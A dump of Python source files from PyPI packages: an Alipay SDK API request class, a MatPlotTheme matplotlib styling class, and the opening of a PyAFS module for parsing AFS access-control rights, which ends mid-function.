id | text | dataset_id
---|---|---|
/alipay_sdk_python-3.6.740-py3-none-any.whl/alipay/aop/api/request/AlipayMarketingToolFengdieActivityCreateRequest.py | import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayMarketingToolFengdieActivityCreateModel import AlipayMarketingToolFengdieActivityCreateModel
class AlipayMarketingToolFengdieActivityCreateRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayMarketingToolFengdieActivityCreateModel):
self._biz_content = value
else:
self._biz_content = AlipayMarketingToolFengdieActivityCreateModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.marketing.tool.fengdie.activity.create'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params | PypiClean |
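# A minimal usage sketch for the request class above (not part of the SDK source).
# It assumes the AlipayMarketingToolFengdieActivityCreateModel constructor takes no
# arguments and that signing/transport is handled elsewhere by the SDK client; the
# URL and token values below are placeholders, not real endpoints or credentials.
from alipay.aop.api.domain.AlipayMarketingToolFengdieActivityCreateModel import AlipayMarketingToolFengdieActivityCreateModel
from alipay.aop.api.request.AlipayMarketingToolFengdieActivityCreateRequest import AlipayMarketingToolFengdieActivityCreateRequest

model = AlipayMarketingToolFengdieActivityCreateModel()
request = AlipayMarketingToolFengdieActivityCreateRequest(biz_model=model)
request.notify_url = 'https://example.com/alipay/notify'       # placeholder callback URL
request.add_other_text_param('app_auth_token', '<app-token>')  # placeholder extra key/value
params = request.get_params()  # dict with the API method name, version and serialized biz_content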
/MatPlotTheme-0.1.2.zip/MatPlotTheme-0.1.2/matplottheme/style/default.py | class Style(object):
'''
This class is a collection of all painting methods provided by the
default style of MatPlotTheme.
:param palette: The palette used for coloring.
'''
def __init__(self, palette):
self.set_palette(palette)
def set_palette(self, palette):
'''
Set the palette used for coloring.
:param palette: The palette used for coloring.
'''
self.palette = palette
def legend(self, ax, *args, **kwargs):
'''
Place a legend to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param legend_alpha: The opacity of background rectangle of the legend. Default is ``0.8``.
:return: The legend
All additional input parameters are passed to :meth:`~matplotlib.axes.legend`.
.. seealso::
:meth:`matplotlib.axes.legend` for documentation on valid kwargs.
'''
# Set and get parameters.
kwargs.setdefault('frameon', True)
kwargs.setdefault('fancybox', True)
legend_alpha = kwargs.pop('legend_alpha', 0.8)
# Call MPL API
legend = ax.legend(*args, **kwargs)
        if not legend:
            raise ValueError("Legend was not generated. Did you add labels "
                             "to the source data?")
# Draw the legend rectangle
rect = legend.get_frame()
rect.set_facecolor(self.palette.legend_bgcolor)
rect.set_alpha(legend_alpha)
rect.set_linewidth(0.0)
# Set legend text
texts = legend.texts
for t in texts:
t.set_color(self.palette.dark_frame)
return legend
def plot(self, ax, *args, **kwargs):
'''
Add a line plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A list of lines that were added.
A major modification made on the line plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current line starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.plot`.
.. seealso::
:meth:`matplotlib.axes.plot` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('plot', ax, *args, **kwargs)
if grid is not None:
self._grid('plot', ax, grid)
return result
def bar(self, ax, position, length, width=0.8, offset=None, *args, **kwargs):
'''
Add a bar plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param position: The position of each bar. Equivalent to ``left``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``bottom`` when ``horizontal``.
:param length: The length of each bar. Equivalent to ``height``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``width`` when ``horizontal``.
:param width: The width of each bar. Equivalent to ``width``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``height`` when ``horizontal``.
:param offset: The start offset of each bar. Equivalent to ``bottom``
parameter of :meth:`matplotlib.axes.Axes.bar` when
``orientation`` is ``vertical``, or ``left`` when ``horizontal``.
:param grid: Add grid lines perpendicular to the bar orientation. Default is ``None``.
Value can be ``None``, ``'x'``, ``'y'``, ``'both'``, or ``'auto'``.
:param ticks: Remove the default positional labels and add custom
tick labels. Default is ``None``.
:param annotations: Add annotations to each bar. Default is ``None``.
:param annotations_loc: Control the position of annotations. Default is ``'out'``.
Value can be ``'out'``, ``'in'``, and ``'center'``.
:param annotations_margin: Control the margin size between annotations
and bars. The value is the portion of plot size. Default is ``0.025``.
:param reset_color_cycle: Reset the color cycle iterator of bars. Default is ``False``.
:return: :class:`matplotlib.patches.Rectangle` instances.
        Parameters ``position``, ``length``, ``width``, and ``offset`` correspond
to the first four parameters of :meth:`matplotlib.axes.Axes.bar`
and :meth:`matplotlib.axes.Axes.barh`.
A major modification made on the bar plot is the change of color
cycle, which is used to color different bars. :class:`matplotlib.axes.Axes`
        uses blue as the default bar color. MatPlotTheme adds a color cycle, which
        is controlled by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current bar starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.bar`.
.. seealso::
:meth:`matplotlib.axes.bar` for documentation on valid kwargs.
'''
# Set and get parameters
grid = kwargs.pop('grid', None)
ticks = kwargs.pop('ticks', None)
annotations = kwargs.pop('annotations', None)
annotations_loc = kwargs.pop('annotations_loc', 'out')
annotations_margin = kwargs.pop('annotations_margin', 0.025)
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs['color'] = color
kwargs.setdefault('edgecolor', self.palette.frame_bgcolor)
# Call MPL API
orientation = kwargs.get('orientation', 'vertical')
if orientation == 'horizontal':
kwargs.pop('orientation')
result = ax.barh(bottom=position, width=length, height=width,
left=offset, *args, **kwargs)
else:
result = ax.bar(left=position, height=length, width=width,
bottom=offset, *args, **kwargs)
# Set initial spines
self._set_spine(ax)
# Set grid
if grid is not None:
if grid == 'auto':
self._grid(
'bar', ax, 'x' if orientation == 'horizontal' else 'y')
else:
self._grid('bar', ax, grid)
import collections
import numpy as np
# Horizontal bar post-process
if orientation == 'horizontal':
ax.tick_params(left='off')
ymin, ymax = ax.get_ylim()
# If any bar is negative, remove and add new y-axis
if not isinstance(length, collections.Iterable):
length = [length]
            if any(l < 0 for l in length):
ax.spines['left'].set_visible(False)
ax.vlines(x=0, ymin=ymin, ymax=ymax)
# Render the tick labels
middle = width / 2.0
if ticks is not None:
ax.set_yticks(np.array(position) + middle)
ax.set_yticklabels(ticks)
# Render the annotation labels
if annotations is not None:
xmin, xmax = ax.get_xlim()
# margin is the distance between bar end and the text
margin = np.log(xmax - xmin) * annotations_margin if \
kwargs.get('log') else (xmax - xmin) * annotations_margin
if not isinstance(annotations, collections.Iterable):
annotations = [annotations]
offset_pos = offset if offset is not None else [
0] * len(position)
for y, l, o, a in zip(np.array(position) + middle, length, offset_pos, annotations):
m = margin if l >= 0 else -1 * margin
if annotations_loc == 'out':
m = m
align = 'left' if l >= 0 else 'right'
elif annotations_loc == 'in':
m = -m
align = 'right' if l >= 0 else 'left'
elif annotations_loc == 'center':
m = -l / 2
align = 'center'
else:
raise ValueError('Invalid annotation location: {loc}'
.format(loc=annotations_loc))
ax.text(l + o + m, y, a,
verticalalignment='center',
horizontalalignment=align,
color=self.palette.dark_frame)
# Vertical bar post-process
else:
ax.tick_params(bottom='off')
xmin, xmax = ax.get_xlim()
# If any bar is negative, remove and add new x-axis
if not isinstance(length, collections.Iterable):
length = [length]
            if any(l < 0 for l in length):
ax.spines['bottom'].set_visible(False)
ax.hlines(y=0, xmin=xmin, xmax=xmax)
# Render the tick labels
middle = width / 2.0
if ticks is not None:
ax.set_xticks(np.array(position) + middle)
ax.set_xticklabels(ticks)
# Render the annotation labels
if annotations is not None:
ymin, ymax = ax.get_ylim()
# margin is the distance between bar end and the text
margin = np.log(ymax - ymin) * annotations_margin if \
kwargs.get('log') else (ymax - ymin) * annotations_margin
if not isinstance(annotations, collections.Iterable):
annotations = [annotations]
offset_pos = offset if offset is not None else [
0] * len(position)
for x, l, o, a in zip(np.array(position) + middle, length, offset_pos, annotations):
m = margin if l >= 0 else -1 * margin
if annotations_loc == 'out':
m = m
align = 'bottom' if l >= 0 else 'top'
elif annotations_loc == 'in':
m = -m
align = 'top' if l >= 0 else 'bottom'
elif annotations_loc == 'center':
m = -l / 2
align = 'center'
else:
raise ValueError('Invalid annotation location: {loc}'
.format(loc=annotations_loc))
ax.text(x, l + o + m, a,
verticalalignment=align,
horizontalalignment='center',
color=self.palette.dark_frame)
return result
def barh(self, ax, position, length, width=0.8, offset=None, *args, **kwargs):
'''
Add a horizontal bar plot to the input :class:`matplotlib.axes.Axes` object.
        This method is a thin wrapper around ``self.bar()``. The parameter ``orientation``
is set to ``'horizontal'`` and all other parameters are passed to ``self.bar()``.
'''
kwargs['orientation'] = 'horizontal'
return self.bar(ax, position, length, width, offset, *args, **kwargs)
def scatter(self, ax, x, y, *args, **kwargs):
'''
Add a scatter plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: :class:`matplotlib.collections.PathCollection` objects.
A major modification made on the scatter plot is the change of color
        cycle, which is used to color the markers. :class:`matplotlib.axes.Axes`
        uses blue as the default marker color. MatPlotTheme adds a color cycle, which
        is controlled by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current scatter plot starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.scatter`.
.. seealso::
:meth:`matplotlib.axes.scatter` for documentation on valid kwargs.
'''
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs.setdefault('facecolor', color)
# Set scatter point style
kwargs.setdefault('edgecolor', self.palette.dark_frame)
kwargs.setdefault('alpha', 0.6)
kwargs.setdefault('linewidth', 0.3)
grid = kwargs.pop('grid', None)
# Call MPL API
result = ax.scatter(x, y, *args, **kwargs)
# Set spines
self._set_spine(ax)
# Set grid
if grid is not None:
self._grid('scatter', ax, grid)
return result
def hist(self, ax, x, *args, **kwargs):
'''
Add a histogram plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input data.
:param grid: Add grid lines perpendicular to the bar orientation. Default is ``None``.
Value can be ``None``, ``'x'``, ``'y'``, ``'both'``, or ``'auto'``.
:param reset_color_cycle: Reset the color cycle iterator of bars. Default is ``False``.
:return: (n, bins, patches) or ([n0, n1, ...], bins, [patches0, patches1,...])
A major modification made on the histogram plot is the change of color
cycle, which is used to color different bars. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current histogram starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.hist`.
.. seealso::
:meth:`matplotlib.axes.hist` for documentation on valid kwargs.
'''
# Set and get parameters
grid = kwargs.pop('grid', None)
orientation = kwargs.get('orientation', 'vertical')
kwargs.setdefault('edgecolor', self.palette.frame_bgcolor)
self._set_color_cycle(ax, *args, **kwargs)
# Call MPL API
result = ax.hist(x, *args, **kwargs)
# Set spines
self._set_spine(ax)
# Set grid
if grid is not None:
if grid == 'auto':
self._grid(
'hist', ax, 'x' if orientation == 'horizontal' else 'y')
else:
self._grid('hist', ax, grid)
return result
def boxplot(self, ax, x, *args, **kwargs):
'''
Add a box plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input data.
:param grid: Add grid lines perpendicular to the bar orientation. Default is ``None``.
Value can be ``None``, ``'x'``, ``'y'``, ``'both'``, or ``'auto'``.
:param ticks: Remove the default positional labels and add custom
tick labels. Default is ``None``.
:return: A dictionary. See :meth:`~matplotlib.axes.boxplot`.
All additional input parameters are passed to :meth:`~matplotlib.axes.boxplot`.
.. seealso::
:meth:`matplotlib.axes.boxplot` for documentation on valid kwargs.
'''
# Set and get parameters
ticks = kwargs.pop('ticks', None)
grid = kwargs.pop('grid', None)
kwargs.setdefault('widths', 0.2)
# Call MPL API
result = ax.boxplot(x, *args, **kwargs)
# Set spines
if kwargs.get('vert', True):
self._set_spine(ax, invisible=['top', 'right', 'bottom'])
else:
self._set_spine(ax, invisible=['top', 'right', 'left'])
# Set box color
import matplotlib.pyplot as plt
plt.setp(result['boxes'], color=self.palette.color_cycle[0])
plt.setp(
result['whiskers'], color=self.palette.color_cycle[0], linestyle='solid')
plt.setp(result['caps'], color=self.palette.color_cycle[0])
plt.setp(result['medians'], color=self.palette.color_cycle[1])
plt.setp(result['fliers'], color=self.palette.color_cycle[2],
marker='_' if kwargs.get('vert', True) else '|')
# Set ticks
if ticks is not None:
if kwargs.get('vert', True):
ax.set_xticklabels(ticks)
else:
ax.set_yticklabels(ticks)
# Set grid
if grid is not None:
if grid == 'auto':
self._grid(
'boxplot', ax, 'x' if not kwargs.get('vert', True) else 'y')
else:
self._grid('boxplot', ax, grid)
return result
def cohere(self, ax, x, y, *args, **kwargs):
'''
Add a coherence plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (Cxy, f), where f are the frequencies of the coherence vector.
A major modification made on the coherence plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current line starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.cohere`.
.. seealso::
:meth:`matplotlib.axes.cohere` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('cohere', ax, x, y, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def csd(self, ax, x, y, *args, **kwargs):
'''
Add a cross-spectral density plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (Pxy, freqs). P is the cross spectrum (complex valued).
A major modification made on the cross-spectral density plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current line starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.csd`.
.. seealso::
:meth:`matplotlib.axes.csd` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('csd', ax, x, y, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def psd(self, ax, x, *args, **kwargs):
'''
Add a power spectral density plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
        :return: A tuple (Pxx, freqs), where Pxx is the power spectral density.
A major modification made on the power spectral density plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current line starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.psd`.
.. seealso::
:meth:`matplotlib.axes.psd` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
result = self._plot_wrapper('psd', ax, x, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def errorbar(self, ax, x, y, *args, **kwargs):
'''
Add an errorbar plot to the input :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
:return: A tuple (plotline, caplines, barlinecols).
A major modification made on the errorbar plot is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current line starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.errorbar`.
.. seealso::
:meth:`matplotlib.axes.errorbar` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
kwargs.setdefault('markeredgewidth', 1.5)
result = self._plot_wrapper('errorbar', ax, x, y, *args, **kwargs)
ax.grid(False)
if grid is not None:
self._grid('plot', ax, grid)
return result
def fill_between(self, ax, x, y1, *args, **kwargs):
'''
Add filled polygons to :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param x: Input x-data.
:param y1: Input y-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
A major modification made on the filled polygons is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current polygon starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.fill_between`.
.. seealso::
:meth:`matplotlib.axes.fill_between` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
kwargs.setdefault('edgecolor', self.palette.dark_frame)
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs.setdefault('facecolor', color)
# Call MPL API
result = ax.fill_between(x, y1, *args, **kwargs)
self._set_spine(ax)
if grid is not None:
self._grid('fill', ax, grid)
return result
def fill_betweenx(self, ax, y, x1, *args, **kwargs):
'''
Add filled polygons to :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param y: Input y-data.
:param x1: Input x-data.
:param grid: Add grid lines to the plot. Default is ``None``. Value
can be ``None``, ``'x'``, ``'y'``, or ``'both'``.
:param reset_color_cycle: Reset the color cycle iterator of lines. Default is ``False``.
        :return: A :class:`matplotlib.collections.PolyCollection` instance.
A major modification made on the filled polygons is the change of color
cycle, which is used to color different lines. :class:`matplotlib.axes.Axes`
uses an iterable cycle to generate colors for different lines. The
color cycle is changed by the :class:`~matplottheme.palette.default.Palette`
        employed. ``reset_color_cycle`` resets the iterable so that the color of
        the current polygon starts again from the beginning of the cycle.
All additional input parameters are passed to :meth:`~matplotlib.axes.fill_betweenx`.
.. seealso::
:meth:`matplotlib.axes.fill_betweenx` for documentation on valid kwargs.
'''
grid = kwargs.pop('grid', None)
kwargs.setdefault('edgecolor', self.palette.dark_frame)
self._set_color_cycle_iter(ax, *args, **kwargs)
# Get current color from the color cycle if not defined by user.
if not 'color' in kwargs:
try:
color = next(ax._matplottheme_color_cycle_iter)
except StopIteration:
ax._matplottheme_color_cycle_iter = iter(
self.palette.color_cycle)
color = next(ax._matplottheme_color_cycle_iter)
kwargs.setdefault('facecolor', color)
# Call MPL API
result = ax.fill_betweenx(y, x1, *args, **kwargs)
self._set_spine(ax)
if grid is not None:
self._grid('fill', ax, grid)
return result
def pcolormesh(self, ax, *args, **kwargs):
'''
Add a quadrilateral mesh to :class:`matplotlib.axes.Axes` object.
:param ax: The input axes object.
:param colorbar: Draw a color bar. Default is ``'vertical'``. Value can be
``'vertical'``, ``'horizontal'``, and ``None``.
:param xticks: Remove the default positional labels and add custom
x-axis tick labels. Default is ``None``.
:param yticks: Remove the default positional labels and add custom
y-axis tick labels. Default is ``None``.
:return: A (:class:`matplotlib.colorbar.Colorbar`, :class:`matplotlib.collections.QuadMesh`) tuple.
All additional input parameters are passed to :meth:`~matplotlib.axes.pcolormesh`.
.. seealso::
:meth:`matplotlib.axes.pcolormesh` for documentation on valid kwargs.
'''
if len(args) == 3:
x = args[0]
y = args[1]
data = args[2]
elif len(args) == 1:
x = None
y = None
data = args[0]
kwargs.setdefault('edgecolor', self.palette.dark_frame)
kwargs.setdefault('linewidth', 0)
if (data.max() <= 0):
kwargs.setdefault('cmap', self.palette.cold_map)
elif (data.min() >= 0):
kwargs.setdefault('cmap', self.palette.warm_map)
else:
kwargs.setdefault('cmap', self.palette.cold_warm_map)
colorbar = kwargs.pop('colorbar', 'vertical')
xticks = kwargs.pop('xticks', None)
yticks = kwargs.pop('yticks', None)
# Call MPL API
result = ax.pcolormesh(*args, **kwargs)
import numpy as np
# Add tick labels
if xticks is not None:
if x is None:
xticks_pos = np.arange(0.5, data.shape[1] + 0.5)
else:
xticks_pos = []
                for i in range(len(x) - 1):
                    xticks_pos.append((x[i + 1] - x[i]) / 2.0 + x[i])
ax.set_xticks(np.array(xticks_pos))
ax.set_xticklabels(xticks)
        if yticks is not None:
            if y is None:
                yticks_pos = np.arange(0.5, data.shape[0] + 0.5)
            else:
                yticks_pos = []
                for i in range(len(y) - 1):
                    yticks_pos.append((y[i + 1] - y[i]) / 2.0 + y[i])
ax.set_yticks(np.array(yticks_pos))
ax.set_yticklabels(yticks)
# Draw color bar
if colorbar is not None:
c = ax.get_figure().colorbar(result, orientation=colorbar)
c.outline.set_linewidth(0)
c.ax.axes.tick_params(right='off')
else:
c = None
self._set_spine(ax, invisible=['top', 'right', 'left', 'bottom'])
return (c, result)
def _plot_wrapper(self, plot_type, ax, *args, **kwargs):
self._set_color_cycle(ax, *args, **kwargs)
kwargs.setdefault('linewidth', 1.5)
# Call MPL API
if plot_type == 'plot':
result = ax.plot(*args, **kwargs)
elif plot_type == 'cohere':
result = ax.cohere(*args, **kwargs)
elif plot_type == 'csd':
result = ax.csd(*args, **kwargs)
elif plot_type == 'psd':
result = ax.psd(*args, **kwargs)
elif plot_type == 'errorbar':
result = ax.errorbar(*args, **kwargs)
else:
raise ValueError(
'{plot_type} is unavailable'.format(plot_type=plot_type))
# Set spines
self._set_spine(ax)
return result
def _grid(self, plot_type, ax, grid, *args, **kwargs):
# Call MPL API
if plot_type in ['bar', 'hist']:
ax.grid(axis=grid, color='white', linestyle='-', linewidth=0.5)
else:
ax.grid(axis=grid, color=self.palette.dark_frame,
linestyle=':', linewidth=0.5)
def _set_color_cycle(self, ax, *args, **kwargs):
# If user decide to reset, or never set color cycle.
reset_color_cycle = kwargs.pop('reset_color_cycle', False)
if reset_color_cycle or \
not hasattr(ax, '_matplottheme_color_cycle'):
ax._matplottheme_color_cycle = self.palette.color_cycle
ax.set_color_cycle(self.palette.color_cycle)
def _set_color_cycle_iter(self, ax, *args, **kwargs):
reset_color_cycle = kwargs.pop('reset_color_cycle', False)
if reset_color_cycle or \
not hasattr(ax, '_matplottheme_color_cycle'):
ax._matplottheme_color_cycle = self.palette.color_cycle
ax._matplottheme_color_cycle_iter = iter(self.palette.color_cycle)
def _set_spine(self, ax, invisible=['top', 'right'], direction='out'):
all_spines = ['top', 'bottom', 'right', 'left']
try:
tick = dict()
for spine in invisible:
ax.spines[spine].set_visible(False)
tick[spine] = 'off'
for spine in set(all_spines).difference(set(invisible)):
ax.spines[spine].set_color(self.palette.dark_frame)
ax.tick_params(axis='both', direction=direction,
colors=self.palette.dark_frame, **tick)
except KeyError:
pass | PypiClean |
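# A hedged usage sketch for the Style class above, written against the matplotlib
# 1.x era API this module relies on (Axes.bar(left=...), tick_params(...='off')).
# DummyPalette is a stand-in defined here only to make the example self-contained;
# the real package supplies a matplottheme.palette.default.Palette instead, and only
# the palette attributes this example actually touches are provided.
import matplotlib.pyplot as plt
from matplottheme.style.default import Style

class DummyPalette(object):
    color_cycle = ['#348ABD', '#7A68A6', '#A60628', '#467821']
    frame_bgcolor = '#FFFFFF'   # used as the bar edge color
    dark_frame = '#333333'      # used for spines, ticks and annotation text
    legend_bgcolor = '#EEEEEE'  # only needed if Style.legend() is called

style = Style(DummyPalette())
fig, ax = plt.subplots()
style.bar(ax, position=range(4), length=[3, -1, 2, 4],
          ticks=['a', 'b', 'c', 'd'],   # custom tick labels replace the positions
          annotations=[3, -1, 2, 4],    # value printed at the end of each bar
          grid='auto')                  # grid lines perpendicular to the bars
fig.savefig('bar_example.png')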
/PyAFS-0.1.1.tar.gz/PyAFS-0.1.1/afs/acl.py | from afs import _acl
from afs._acl import READ, WRITE, INSERT, LOOKUP, DELETE, LOCK, ADMINISTER, \
USR0, USR1, USR2, USR3, USR4, USR5, USR6, USR7
from afs._acl import getCallerAccess
_canonical = {
"read": "rl",
"write": "rlidwk",
"all": "rlidwka",
"mail": "lik",
"none": "",
}
_reverseCanonical = dict((y, x) for (x, y) in _canonical.iteritems())
_charBitAssoc = [
('r', READ),
('l', LOOKUP),
('i', INSERT),
('d', DELETE),
('w', WRITE),
('k', LOCK),
('a', ADMINISTER),
('A', USR0),
('B', USR1),
('C', USR2),
('D', USR3),
('E', USR4),
('F', USR5),
('G', USR6),
('H', USR7),
]
_char2bit = dict(_charBitAssoc)
def rightsToEnglish(s):
"""Turns a rlwidwka string into a canonical name if possible"""
if s in _reverseCanonical:
return _reverseCanonical[s]
else:
return ''
def readRights(s):
"""Canonicalizes string rights to bitmask"""
if s in _canonical: s = _canonical[s]
return _parseRights(s)
def showRights(r):
"""Takes a bitmask and returns a rwlidka string"""
s = ""
for char,mask in _charBitAssoc:
if r & mask == mask: s += char
return s
def _parseRights(s):
"""Parses a rwlid... rights tring to bitmask"""
r = 0
try:
for c in s:
r = r | _char2bit[c]
except KeyError:
raise ValueError
return r
def _parseAcl(inp):
lines = inp.split("\n")
npos = int(lines[0].split(" ")[0])
pos = {}
neg = {}
for l in lines[2:]:
if l == "": continue
name, acl = l.split()
if npos:
npos -= 1
pos[name] = int(acl)
else:
# negative acl
neg[name] = int(acl)
return (pos, neg)
def _unparseAcl(pos, neg):
npos = len(pos)
nneg = len(neg)
acl = "%d\n%d\n" % (npos, nneg)
